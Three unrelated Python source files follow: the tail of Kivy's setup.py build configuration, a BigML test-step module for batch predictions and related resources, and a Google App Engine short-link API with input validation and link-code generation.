'c_string_encoding': 'utf-8',
'profile': 'USE_PROFILE' in environ,
'embedsignature': 'USE_EMBEDSIGNATURE' in environ}
# XXX with pip, setuptools is imported before distutils, and change
# our pyx to c, then, cythonize doesn't happen. So force again our
# sources
self.sources = args[1]
def merge(d1, *args):
d1 = deepcopy(d1)
for d2 in args:
for key, value in d2.items():
value = deepcopy(value)
if key in d1:
d1[key].extend(value)
else:
d1[key] = value
return d1
def determine_base_flags():
flags = {
'libraries': [],
'include_dirs': [join(src_path, 'kivy', 'include')],
'library_dirs': [],
'extra_link_args': [],
'extra_compile_args': []}
if c_options['use_ios']:
sysroot = environ.get('IOSSDKROOT', environ.get('SDKROOT'))
if not sysroot:
raise Exception('IOSSDKROOT is not set')
flags['include_dirs'] += [sysroot]
flags['extra_compile_args'] += ['-isysroot', sysroot]
flags['extra_link_args'] += ['-isysroot', sysroot]
elif platform.startswith('freebsd'):
flags['include_dirs'] += [join(
environ.get('LOCALBASE', '/usr/local'), 'include')]
flags['library_dirs'] += [join(
environ.get('LOCALBASE', '/usr/local'), 'lib')]
elif platform == 'darwin':
v = os.uname()
if v[2] >= '13.0.0':
# use xcode-select to search on the right Xcode path
# XXX use the best SDK available instead of a specific one
import platform as _platform
xcode_dev = getoutput('xcode-select -p').splitlines()[0]
sdk_mac_ver = '.'.join(_platform.mac_ver()[0].split('.')[:2])
print('Xcode detected at {}, and using OS X{} sdk'.format(
xcode_dev, sdk_mac_ver))
sysroot = join(
xcode_dev.decode('utf-8'),
'Platforms/MacOSX.platform/Developer/SDKs',
'MacOSX{}.sdk'.format(sdk_mac_ver),
'System/Library/Frameworks')
else:
sysroot = ('/System/Library/Frameworks/'
'ApplicationServices.framework/Frameworks')
flags['extra_compile_args'] += ['-F%s' % sysroot]
flags['extra_link_args'] += ['-F%s' % sysroot]
elif platform == 'win32':
flags['include_dirs'] += [get_python_inc(prefix=sys.prefix)]
flags['library_dirs'] += [join(sys.prefix, "libs")]
return flags
def determine_gl_flags():
kivy_graphics_include = join(src_path, 'kivy', 'include')
flags = {'include_dirs': [kivy_graphics_include], 'libraries': []}
base_flags = {'include_dirs': [kivy_graphics_include], 'libraries': []}
if c_options['use_opengl_mock']:
return flags, base_flags
if platform == 'win32':
flags['libraries'] = ['opengl32', 'glew32']
elif platform == 'ios':
flags['libraries'] = ['GLESv2']
flags['extra_link_args'] = ['-framework', 'OpenGLES']
elif platform == 'darwin':
flags['extra_link_args'] = ['-framework', 'OpenGL', '-arch', osx_arch]
flags['extra_compile_args'] = ['-arch', osx_arch]
elif platform.startswith('freebsd'):
flags['libraries'] = ['GL']
elif platform.startswith('openbsd'):
flags['include_dirs'] = ['/usr/X11R6/include']
flags['library_dirs'] = ['/usr/X11R6/lib']
flags['libraries'] = ['GL']
elif platform == 'android':
flags['include_dirs'] = [join(ndkplatform, 'usr', 'include')]
flags['library_dirs'] = [join(ndkplatform, 'usr', 'lib')]
flags['libraries'] = ['GLESv2']
elif platform == 'rpi':
flags['include_dirs'] = [
'/opt/vc/include',
'/opt/vc/include/interface/vcos/pthreads',
'/opt/vc/include/interface/vmcs_host/linux']
flags['library_dirs'] = ['/opt/vc/lib']
flags['libraries'] = ['bcm_host', 'EGL', 'GLESv2']
elif platform == 'mali':
flags['include_dirs'] = ['/usr/include/']
flags['library_dirs'] = ['/usr/lib/arm-linux-gnueabihf']
flags['libraries'] = ['GLESv2']
c_options['use_x11'] = True
c_options['use_egl'] = True
else:
flags['libraries'] = ['GL']
return flags, base_flags
def determine_sdl2():
flags = {}
if not c_options['use_sdl2']:
return flags
sdl2_path = environ.get('KIVY_SDL2_PATH', None)
if sdl2_flags and not sdl2_path and platform == 'darwin':
return sdl2_flags
# no pkgconfig info, or we want to use a specific sdl2 path, so perform
# manual configuration
flags['libraries'] = ['SDL2', 'SDL2_ttf', 'SDL2_image', 'SDL2_mixer']
split_chr = ';' if platform == 'win32' else ':'
sdl2_paths = sdl2_path.split(split_chr) if sdl2_path else []
if not sdl2_paths:
sdl_inc = join(sys.prefix, 'include', 'SDL2')
if isdir(sdl_inc):
sdl2_paths = [sdl_inc]
sdl2_paths.extend(['/usr/local/include/SDL2', '/usr/include/SDL2'])
flags['include_dirs'] = sdl2_paths
flags['extra_link_args'] = []
flags['extra_compile_args'] = []
flags['library_dirs'] = (
sdl2_paths if sdl2_paths else
['/usr/local/lib/'])
if sdl2_flags:
flags = merge(flags, sdl2_flags)
# ensure headers for all the SDL2 and sub libraries are available
libs_to_check = ['SDL', 'SDL_mixer', 'SDL_ttf', 'SDL_image']
can_compile = True
for lib in libs_to_check:
found = False
for d in flags['include_dirs']:
fn = join(d, '{}.h'.format(lib))
if exists(fn):
found = True
print('SDL2: found {} header at {}'.format(lib, fn))
break
if not found:
print('SDL2: missing sub library {}'.format(lib))
can_compile = False
if not can_compile:
c_options['use_sdl2'] = False
return {}
return flags
base_flags = determine_base_flags()
gl_flags, gl_flags_base = determine_gl_flags()
# -----------------------------------------------------------------------------
# sources to compile
# all the dependencies have been found manually with:
# grep -inr -E '(cimport|include)' kivy/graphics/context_instructions.{pxd,pyx}
graphics_dependencies = {
'gl_redirect.h': ['common_subset.h', 'gl_mock.h'],
'buffer.pyx': ['common.pxi'],
'context.pxd': ['instructions.pxd', 'texture.pxd', 'vbo.pxd', 'cgl.pxd'],
'cgl.pxd': ['common.pxi', 'config.pxi', 'gl_redirect.h'],
'compiler.pxd': ['instructions.pxd'],
'compiler.pyx': ['context_instructions.pxd'],
'cgl.pyx': ['cgl.pxd'],
'cgl_mock.pyx': ['cgl.pxd'],
'cgl_sdl2.pyx': ['cgl.pxd'],
'cgl_gl.pyx': ['cgl.pxd'],
'cgl_glew.pyx': ['cgl.pxd'],
'context_instructions.pxd': [
'transformation.pxd', 'instructions.pxd', 'texture.pxd'],
'fbo.pxd': ['cgl.pxd', 'instructions.pxd', 'texture.pxd'],
'fbo.pyx': [
'config.pxi', 'opcodes.pxi', 'transformation.pxd', 'context.pxd'],
'gl_instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd', 'instructions.pxd'],
'instructions.pxd': [
'vbo.pxd', 'context_instructions.pxd', 'compiler.pxd', 'shader.pxd',
'texture.pxd', '../_event.pxd'],
'instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd',
'context.pxd', 'common.pxi', 'vertex.pxd', 'transformation.pxd'],
'opengl.pyx': [
'config.pxi', 'common.pxi', 'cgl.pxd', 'gl_redirect.h'],
'opengl_utils.pyx': [
'opengl_utils_def.pxi', 'cgl.pxd', ],
'shader.pxd': ['cgl.pxd', 'transformation.pxd', 'vertex.pxd'],
'shader.pyx': [
'config.pxi', 'common.pxi', 'cgl.pxd',
'vertex.pxd', 'transformation.pxd', 'context.pxd',
'gl_debug_logger.pxi'],
'stencil_instructions.pxd': ['instructions.pxd'],
'stencil_instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd',
'gl_debug_logger.pxi'],
'scissor_instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd'],
'svg.pyx': ['config.pxi', 'common.pxi', 'texture.pxd', 'instructions.pxd',
'vertex_instructions.pxd', 'tesselator.pxd'],
'texture.pxd': ['cgl.pxd'],
'texture.pyx': [
'config.pxi', 'common.pxi', 'opengl_utils_def.pxi', 'context.pxd',
'cgl.pxd', 'opengl_utils.pxd',
'img_tools.pxi', 'gl_debug_logger.pxi'],
'vbo.pxd': ['buffer.pxd', 'cgl.pxd', 'vertex.pxd'],
'vbo.pyx': [
'config.pxi', 'common.pxi', 'context.pxd',
'instructions.pxd', 'shader.pxd', 'gl_debug_logger.pxi'],
'vertex.pxd': ['cgl.pxd'],
'vertex.pyx': ['config.pxi', 'common.pxi'],
'vertex_instructions.pyx': [
'config.pxi', 'common.pxi', 'vbo.pxd', 'vertex.pxd',
'instructions.pxd', 'vertex_instructions.pxd',
'cgl.pxd', 'texture.pxd', 'vertex_instructions_line.pxi'],
'vertex_instructions_line.pxi': ['stencil_instructions.pxd']}
sources = {
'_event.pyx': merge(base_flags, {'depends': ['properties.pxd']}),
'_clock.pyx': {},
'weakproxy.pyx': {},
'properties.pyx': merge(base_flags, {'depends': ['_event.pxd']}),
'graphics/buffer.pyx': merge(base_flags, gl_flags_base),
'graphics/context.pyx': merge(base_flags, gl_flags_base),
'graphics/compiler.pyx': merge(base_flags, gl_flags_base),
'graphics/context_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/fbo.pyx': merge(base_flags, gl_flags_base),
'graphics/gl_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/opengl.pyx': merge(base_flags, gl_flags_base),
'graphics/opengl_utils.pyx': merge(base_flags, gl_flags_base),
'graphics/shader.pyx': merge(base_flags, gl_flags_base),
'graphics/stencil_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/scissor_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/texture.pyx': merge(base_flags, gl_flags_base),
'graphics/transformation.pyx': merge(base_flags, gl_flags_base),
'graphics/vbo.pyx': merge(base_flags, gl_flags_base),
'graphics/vertex.pyx': merge(base_flags, gl_flags_base),
'graphics/vertex_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl_backend/cgl_mock.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl_backend/cgl_gl.pyx': merge(base_flags, gl_flags),
'graphics/cgl_backend/cgl_glew.pyx': merge(base_flags, gl_flags),
'graphics/cgl_backend/cgl_sdl2.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl_backend/cgl_debug.pyx': merge(base_flags, gl_flags_base),
'core/text/text_layout.pyx': base_flags,
'graphics/tesselator.pyx': merge(base_flags, {
'include_dirs': ['kivy/lib/libtess2/Include'],
'c_depends': [
'lib/libtess2/Source/bucketalloc.c',
'lib/libtess2/Source/dict.c',
'lib/libtess2/Source/geom.c',
'lib/libtess2/Source/mesh.c',
'lib/libtess2/Source/priorityq.c',
'lib/libtess2/Source/sweep.c',
'lib/libtess2/Source/tess.c'
]
}),
'graphics/svg.pyx': merge(base_flags, gl_flags_base)
}
if c_options["use_sdl2"]:
sdl2_flags = determine_sdl2()
if c_options['use_sdl2'] and sdl2_flags:
sources['graphics/cgl_backend/cgl_sdl2.pyx'] = merge(
sources['graphics/cgl_backend/cgl_sdl2.pyx'], sdl2_flags)
sdl2_depends = {'depends': ['lib/sdl2.pxi']}
for source_file in ('core/window/_window_sdl2.pyx',
'core/image/_img_sdl2.pyx',
'core/text/_text_sdl2.pyx',
'core/audio/audio_sdl2.pyx',
'core/clipboard/_clipboard_sdl2.pyx'):
sources[source_file] = merge(
base_flags, sdl2_flags, sdl2_depends)
if platform in ('darwin', 'ios'):
# activate ImageIO provider for our core image
if platform == 'ios':
osx_flags = {'extra_link_args': [
'-framework', 'Foundation',
'-framework', 'UIKit',
'-framework', 'AudioToolbox',
'-framework', 'CoreGraphics',
'-framework', 'QuartzCore',
'-framework', 'ImageIO',
'-framework', 'Accelerate']}
else:
osx_flags = {'extra_link_args': [
'-framework', 'ApplicationServices']}
sources['core/image/img_imageio.pyx'] = merge(
base_flags, osx_flags)
if c_options['use_avfoundation']:
import platform as _platform
mac_ver = [int(x) for x in _platform.mac_ver()[0].split('.')[:2]]
if mac_ver >= [10, 7]:
osx_flags = {
'extra_link_args': ['-framework', 'AVFoundation'],
'extra_compile_args': ['-ObjC++'],
'depends': ['core/camera/camera_avfoundation_implem.m']}
sources['core/camera/camera_avfoundation.pyx'] = merge(
base_flags, osx_flags)
else:
print('AVFoundation cannot be used, OSX >= 10.7 is required')
if c_options['use_rpi']:
sources['lib/vidcore_lite/egl.pyx'] = merge(
base_flags, gl_flags)
sources['lib/vidcore_lite/bcm.pyx'] = merge(
base_flags, gl_flags)
if c_options['use_x11']:
libs = ['Xrender', 'X11']
if c_options['use_egl']:
libs += ['EGL']
else:
libs += ['GL']
sources['core/window/window_x11.pyx'] = merge(
base_flags, gl_flags, {
# FIXME add an option to depend on them but not compile them
# cause keytab is included in core, and core is included in
# window_x11
#
# 'depends': [
# 'core/window/window_x11_keytab.c',
# 'core/window/window_x11_core.c'],
'libraries': libs})
if c_options['use_gstreamer']:
sources['lib/gstplayer/_gstplayer.pyx'] = merge(
base_flags, gst_flags, {
'depends': ['lib/gstplayer/_gstplayer.h']})
# -----------------------------------------------------------------------------
# extension modules
def get_dependencies(name, deps=None):
if deps is None:
deps = []
for dep in graphics_dependencies.get(name, []):
if dep not in deps:
deps.append(dep)
get_dependencies(dep, deps)
return deps
def resolve_dependencies(fn, depends):
fn = basename(fn)
deps = []
get_dependencies(fn, deps)
get_dependencies(fn.replace('.pyx', '.pxd'), deps)
return [expand(src_path, 'graphics', x) for x in deps]
def get_extensions_from_sources(sources):
ext_modules = []
if environ.get('KIVY_FAKE_BUILDEXT'):
print('Fake build_ext asked, will generate only .h/.c')
return ext_modules
for pyx, flags in sources.items():
is_graphics = pyx.startswith('graphics')
pyx = expand(src_path, pyx)
depends = [expand(src_path, x) for x in flags.pop('depends', [])]
c_depends = [expand(src_path, x) for x in flags.pop('c_depends', [])]
if not have_cython:
pyx = '%s.c' % pyx[:-4]
if is_graphics:
depends = resolve_dependencies(pyx, depends)
f_depends = [x for x in depends if x.rsplit('.', 1)[-1] in (
'c', 'cpp', 'm')]
module_name = get_modulename_from_file(pyx)
flags_clean = {'depends': depends}
for key, value in flags.items():
if len(value):
flags_clean[key] = value
ext_modules.append(CythonExtension(
module_name, [pyx] + f_depends + c_depends, **flags_clean))
return ext_modules
ext_modules = get_extensions_from_sources(sources)
# -----------------------------------------------------------------------------
# automatically detect data files
split_examples = int(environ.get('KIVY_SPLIT_EXAMPLES', '0'))
data_file_prefix = 'share/kivy-'
examples = {}
examples_allowed_ext = ('readme', 'py', 'wav', 'png', 'jpg', 'svg', 'json',
'avi', 'gif', 'txt', 'ttf', 'obj', 'mtl', 'kv', 'mpg',
'glsl', 'zip')
for root, subFolders, files in walk('examples'):
for fn in files:
ext = fn.split('.')[-1].lower()
if ext not in examples_allowed_ext:
continue
filename = join(root, fn)
directory = '%s%s' % (data_file_prefix, dirname(filename))
if directory not in examples:
examples[directory] = []
examples[directory].append(filename)
binary_deps = []
binary_deps_path = join(src_path, 'kivy', 'binary_deps')
if isdir(binary_deps_path):
for root, dirnames, filenames in walk(binary_deps_path):
for fname in filenames:
binary_deps.append(
join(root.replace(binary_deps_path, 'binary_deps'), fname))
# -----------------------------------------------------------------------------
# setup !
if not build_examples:
setup(
name='Kivy',
version=get_version(),
author='Kivy Team and other contributors',
author_email='[email protected]',
url='http://kivy.org',
license='MIT',
description=(
'A software library for rapid development of '
'hardware-accelerated multitouch applications.'),
ext_modules=ext_modules,
cmdclass=cmdclass,
packages=[
'kivy',
'kivy.adapters',
'kivy.core',
'kivy.core.audio',
'kivy.core.camera',
'kivy.core.clipboard',
'kivy.core.image',
'kivy.core.gl',
'kivy.core.spelling',
'kivy.core.text',
'kivy.core.video',
'kivy.core.window',
'kivy.deps',
'kivy.effects',
'kivy.graphics',
'kivy.graphics.cgl_backend',
'kivy.garden',
'kivy.input',
'kivy.input.postproc',
'kivy.input.providers',
'kivy.lang',
'kivy.lib',
'kivy.lib.osc',
'kivy.lib.gstplayer',
'kivy.lib.vidcore_lite',
'kivy.modules',
'kivy.network',
'kivy.storage',
'kivy.tests',
'kivy.tools',
'kivy.tools.packaging',
'kivy.tools.packaging.pyinstaller_hooks',
'kivy.tools.highlight',
'kivy.extras',
'kivy.uix',
'kivy.uix.behaviors',
'kivy.uix.recycleview',
],
package_dir={'kivy': 'kivy'},
package_data={'kivy': [
'*.pxd',
'*.pxi',
'core/text/*.pxd',
'core/text/*.pxi',
'graphics/*.pxd',
'graphics/*.pxi',
'graphics/*.h',
'include/*',
'lib/vidcore_lite/*.pxd',
'lib/vidcore_lite/*.pxi',
'data/*.kv',
'data/*.json',
'data/fonts/*.ttf',
'data/images/*.png',
'data/images/*.jpg',
'data/images/*.gif',
'data/images/*.atlas',
'data/keyboards/*.json',
'data/logo/*.png',
'data/glsl/*.png',
'data/glsl/*.vs',
'data/glsl/*.fs',
'tests/*.zip',
'tests/*.kv',
'tests/*.png',
'tests/*.ttf',
'tests/*.ogg',
'tools/highlight/*.vim',
'tools/highlight/*.el',
'tools/packaging/README.txt',
'tools/packaging/win32/kivy.bat',
'tools/packaging/win32/kivyenv.sh',
'tools/packaging/win32/README.txt',
'tools/packaging/osx/Info.plist',
'tools/packaging/osx/InfoPlist.strings',
'tools/gles_compat/*.h',
'tools/packaging/osx/kivy.sh'] + binary_deps},
data_files=[] if split_examples else list(examples.items()),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: MacOS X',
'Environment :: Win32 (MS Windows)',
'Environment :: X11 Applications',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Artistic Software',
'Topic :: Games/Entertainment',
'Topic :: Multimedia :: Graphics :: 3D Rendering',
'Topic :: Multimedia :: Graphics :: Capture :: Digital Camera',
'Topic :: Multimedia :: Graphics :: Presentation',
'Topic :: Multimedia :: Graphics :: Viewers',
'Topic :: Multimedia :: Sound/Audio :: Players :: MP3',
'Topic :: Multimedia :: Video :: Display',
'Topic :: Scientific/Engineering :: Human Machine Interfaces',
'Topic :: Scientific/Engineering :: Visualization',
('Topic :: Software Development :: Libraries :: '
'Application Frameworks'),
'Topic :: Software Development :: User Interfaces'],
dependency_links=[
'https://github.com/kivy-garden/garden/archive/master.zip'],
install_requires=['Kivy-Garden>=0.1.4', 'docutils', 'pygments'],
setup_requires=[
'cython>=' + MIN_CYTHON_STRING
] if not skip_cython else [])
else:
setup(
name='Kivy-examples',
version=get_version(),
author='Kivy Team and other contributors',
author_email='[email protected]',
url='http://kivy.org',
license='MIT',
description=('Kivy examples.'),
data_files=list(examples.items()))
|
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2012-2015 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import json
import requests
import csv
import traceback
from datetime import datetime, timedelta
from world import world, res_filename
from bigml.api import HTTP_CREATED
from bigml.api import FINISHED
from bigml.api import FAULTY
from bigml.api import get_status
from bigml.io import UnicodeReader
from read_batch_prediction_steps import (i_get_the_batch_prediction,
i_get_the_batch_centroid, i_get_the_batch_anomaly_score)
#@step(r'I create a batch prediction for the dataset with the model$')
def i_create_a_batch_prediction(step):
dataset = world.dataset.get('resource')
model = world.model.get('resource')
resource = world.api.create_batch_prediction(model, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_prediction = resource['object']
world.batch_predictions.append(resource['resource'])
#@step(r'I create a batch prediction for the dataset with the ensemble$')
def i_create_a_batch_prediction_ensemble(step):
dataset = world.dataset.get('resource')
ensemble = world.ensemble.get('resource')
resource = world.api.create_batch_prediction(ensemble, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_prediction = resource['object']
world.batch_predictions.append(resource['resource'])
#@step(r'I wait until the batch prediction status code is either (\d) or (-\d) less than (\d+)')
def wait_until_batch_prediction_status_code_is(step, code1, code2, secs):
start = datetime.utcnow()
i_get_the_batch_prediction(step, world.batch_prediction['resource'])
status = get_status(world.batch_prediction)
while (status['code'] != int(code1) and
status['code'] != int(code2)):
time.sleep(3)
assert datetime.utcnow() - start < timedelta(seconds=int(secs))
i_get_the_batch_prediction(step, world.batch_prediction['resource'])
status = get_status(world.batch_prediction)
assert status['code'] == int(code1)
#@step(r'I wait until the batch centroid status code is either (\d) or (-\d) less than (\d+)')
def wait_until_batch_centroid_status_code_is(step, code1, code2, secs):
start = datetime.utcnow()
i_get_the_batch_centroid(step, world.batch_centroid['resource'])
status = get_status(world.batch_centroid)
while (status['code'] != int(code1) and
status['code'] != int(code2)):
time.sleep(3)
assert datetime.utcnow() - start < timedelta(seconds=int(secs))
i_get_the_batch_centroid(step, world.batch_centroid['resource'])
status = get_status(world.batch_centroid)
assert status['code'] == int(code1)
#@step(r'I wait until the batch anomaly score status code is either (\d) or (-\d) less than (\d+)')
def wait_until_batch_anomaly_score_status_code_is(step, code1, code2, secs):
start = datetime.utcnow()
i_get_the_batch_anomaly_score(step, world.batch_anomaly_score['resource'])
status = get_status(world.batch_anomaly_score)
while (status['code'] != int(code1) and
status['code'] != int(code2)):
time.sleep(3)
assert datetime.utcnow() - start < timedelta(seconds=int(secs))
i_get_the_batch_anomaly_score(step, world.batch_anomaly_score['resource'])
status = get_status(world.batch_anomaly_score)
assert status['code'] == int(code1)
#@step(r'I wait until the batch prediction is ready less than (\d+)')
def the_batch_prediction_is_finished_in_less_than(step, secs):
wait_until_batch_prediction_status_code_is(step, FINISHED, FAULTY, secs)
#@step(r'I wait until the batch centroid is ready less than (\d+)')
def the_batch_centroid_is_finished_in_less_than(step, secs):
wait_until_batch_centroid_status_code_is(step, FINISHED, FAULTY, secs)
#@step(r'I wait until the batch anomaly score is ready less than (\d+)')
def the_batch_anomaly_score_is_finished_in_less_than(step, secs):
wait_until_batch_anomaly_score_status_code_is(step, FINISHED, FAULTY, secs)
#@step(r'I download the created predictions file to "(.*)"')
def i_download_predictions_file(step, filename):
file_object = world.api.download_batch_prediction(
world.batch_prediction, filename=res_filename(filename))
assert file_object is not None
world.output = file_object
#@step(r'I download the created centroid file to "(.*)"')
def i_download_centroid_file(step, filename):
file_object = world.api.download_batch_centroid(
world.batch_centroid, filename=res_filename(filename))
assert file_object is not None
world.output = file_object
#@step(r'I download the created anomaly score file to "(.*)"')
def i_download_anomaly_score_file(step, filename):
file_object = world.api.download_batch_anomaly_score(
world.batch_anomaly_score, filename=res_filename(filename))
assert file_object is not None
world.output = file_object
def check_rows(prediction_rows, test_rows):
for row in prediction_rows:
check_row = next(test_rows)
assert len(check_row) == len (row)
for index in range(len(row)):
dot = row[index].find(".")
if dot > 0:
try:
decs = min(len(row[index]), len(check_row[index])) - dot - 1
row[index] = round(float(row[index]), decs)
check_row[index] = round(float(check_row[index]), decs)
except ValueError:
pass
assert check_row[index] == row[index], ("Got: %s/ Expected: %s" % (row, check_row))
#@step(r'the batch prediction file is like "(.*)"')
def i_check_predictions(step, check_file):
with UnicodeReader(world.output) as prediction_rows:
with UnicodeReader(res_filename(check_file)) as test_rows:
check_rows(prediction_rows, test_rows)
#@step(r'the batch centroid file is like "(.*)"')
def i_check_batch_centroid(step, check_file):
i_check_predictions(step, check_file)
#@step(r'the batch anomaly score file is like "(.*)"')
def i_check_batch_anomaly_score(step, check_file):
i_check_predictions(step, check_file)
#@step(r'I check the batch centroid is ok')
def i_check_batch_centroid_is_ok(step):
assert world.api.ok(world.batch_centroid)
#@step(r'I check the batch anomaly score is ok')
def i_check_batch_anomaly_score_is_ok(step):
assert world.api.ok(world.batch_anomaly_score)
#@step(r'I create a batch centroid for the dataset$')
def i_create_a_batch_prediction_with_cluster(step):
dataset = world.dataset.get('resource')
cluster = world.cluster.get('resource')
resource = world.api.create_batch_centroid(cluster, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_centroid = resource['object']
world.batch_centroids.append(resource['resource'])
#@step(r'I create a batch anomaly score$')
def i_create_a_batch_prediction_with_anomaly(step):
dataset = world.dataset.get('resource')
anomaly = world.anomaly.get('resource')
resource = world.api.create_batch_anomaly_score(anomaly, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_anomaly_score = resource['object']
world.batch_anomaly_scores.append(resource['resource'])
#@step(r'I create a source from the batch prediction$')
def i_create_a_source_from_batch_prediction(step):
batch_prediction = world.batch_prediction.get('resource')
resource = world.api.source_from_batch_prediction(batch_prediction)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.source = resource['object']
world.sources.append(resource['resource'])
|
|
import logging
import re
import random
import os
import time
from google.appengine.ext import ndb
from google.appengine.ext import endpoints
from google.appengine.ext import deferred
from google.appengine.api import memcache
from protorpc import remote
from model import ShortLink
import api_messages
import utils
from api_messages import CreateShortLinkMessageRequest
from api_messages import CreateShortLinkMessageResponse
from api_messages import ListShortLinkMessageRequest
from api_messages import ShortLinkMessage
from api_messages import ListShortLinkMessageResponse
from api_messages import ReadShortLinkMessageRequest
from api_messages import ReadShortLinkMessageResponse
from api_messages import DeleteShortLinkMessageRequest
from api_messages import DeleteShortLinkMessageResponse
NUM_SHARDS = 20
SHARD_KEY_TEMPLATE = 'shard-{}-{:d}'
@endpoints.api(name='shortlink', version='v1', description='Short Link API',
owner_domain="lnkr.co.za", owner_name="lnkr",
package_path="android")
class ShortLinkApi(remote.Service):
""" This is the API for managing short links. """
def ValidateInput(self, request):
""" Validate the input for a short link creation request.
Args:
request: the request to create a short link.
Returns:
A list of validation errors which is empty if there are no errors.
"""
disallowed_custom = [ 'index.html', 'js', 'style', 'about.html', 'api.html',
'stats.html', 'data', 'favicon', 'robots' ];
validation_errors = []
if request.short_link:
if not re.search(r'^[a-zA-Z0-9-.]+$', request.short_link):
validation_errors.append(('Short links can only be alpha-numeric '
'characters, numbers or . or -'))
if request.short_link in disallowed_custom:
validation_errors.append('That short link is already in use.')
if len(request.short_link) < 3:
validation_errors.append('Custom short links must be longer than 3 characters')
if (not request.target_link) or len(request.target_link) == 0:
validation_errors.append('Please provide a target URL')
else:
if not re.search(r'^https?://', request.target_link):
validation_errors.append('The target URL provided is invalid - only http or https allowed.')
return validation_errors
def GenerateShortLinkCode(self, num_links):
""" Generate a short link code.
This generates the short link code (i.e. the XyZAbC part in
http://blah/XyZAbC. The idea came from http://en.wikipedia.org/wiki/Base_36
Generate more than one at a time in case a link is already taken.
Args:
num_links: the number of short links to generate at once.
Returns:
A list of short link codes.
"""
desired_length = 6
alphabet='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-'
result = []
for i in range(num_links):
base = []
for i in range(desired_length):
pos = random.randrange(0, len(alphabet), 1)
base.append(alphabet[pos])
result.append(''.join(base))
return result
@endpoints.method(CreateShortLinkMessageRequest,
CreateShortLinkMessageResponse, name='create',
path= '/create', http_method = 'POST')
def CreateShortLink(self, request):
""" The API endpoint for creating a short link.
Args:
request: the API request to create a short link.
Returns:
A message containing either a status code, the short link created and a
message.
Creates a short link and stores it in datastore. The flow is
1) validate the input
2) for user-chosen short links, check if the short link exists already
3) generate n short links
3a) if all n short links are already taken, try again, if still all are
taken, give up
3b) of the short links still available, choose one at random
4) write the data to datastore
"""
chosen_link = ''
# Validate input
validation_errors = self.ValidateInput(request)
if len(validation_errors) > 0:
logging.info('Validation errors: %s' % (', '.join(validation_errors)))
return CreateShortLinkMessageResponse(status = 1, msg = validation_errors)
# Check if the short link already exists (for a custom short link)
if request.short_link:
query = ShortLink.query(ShortLink.short_link == request.short_link)
results = query.fetch(1)
if len(results) == 1:
return CreateShortLinkMessageResponse(status = 1,
msg = [('Sorry, the short link '
'you requested is already'
' taken')])
else:
# Generate a short link if a custom one wasn't requested
gen_links = self.GenerateShortLinkCode(10)
query = ShortLink.query(ShortLink.short_link.IN(gen_links))
results = query.fetch(len(gen_links))
logging.info('Found %d collisions!' % (len(results)))
if len(results) == len(gen_links):
# oh dear, all of our generated links already exists.
logging.info(' Wow, all are taken!')
gen_links = self.GenerateShortLinkCode(10)
query = ShortLink.query(ShortLink.short_link.IN(gen_links))
results = query.fetch(len(gen_links))
if len(results) == len(gen_links):
logging.info(' Wow, all of the backup ones are taken too, I give up!')
# I give up
return CreateShortLinkMessageResponse(status = 1,
msg = [('Sorry, the short link '
'you requested is already'
'taken. I really did try'
', Jim, but we just '
'don\'t have the '
'entropy!')])
else:
taken = set()
for r in results:
taken.add(r.short_link)
available = set(gen_links) - taken
chosen_link = list(available)[random.randrange(0, len(available))]
logging.info(' On second attempt, found %d available so now chose %s'
% (len(available), chosen_link))
else:
taken = set()
for r in results:
taken.add(r.short_link)
available = set(gen_links) - taken
chosen_link = list(available)[random.randrange(0, len(available))]
logging.info(' On first attempt, found %d available so now chose %s'
% (len(available), chosen_link))
short_link_in = request.short_link or chosen_link
# Choose a shard for the new entity.
# Details of this approach are here:
# https://developers.google.com/appengine/articles/sharding_counters
parent_index = random.randint(0, NUM_SHARDS - 1)
parent_key_string = SHARD_KEY_TEMPLATE.format('ShortlinkParent',
parent_index)
parent_key = ndb.Key("LinkList", parent_key_string)
link = ShortLink(parent = parent_key, short_link = short_link_in,
target_link = request.target_link,
created_date = long(time.time()*1000))
try:
link.put()
deferred.defer(utils.updateMetric, 'create',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return CreateShortLinkMessageResponse(status = 0,
short_link = short_link_in,
target_link = request.target_link,
created_date =
long(time.time()*1000))
except Exception, e:
logging.info('Error -- failed to create the link')
logging.exception(e)
return CreateShortLinkMessageResponse(status = 1,
msg = [('Failed to create the '
'short link')])
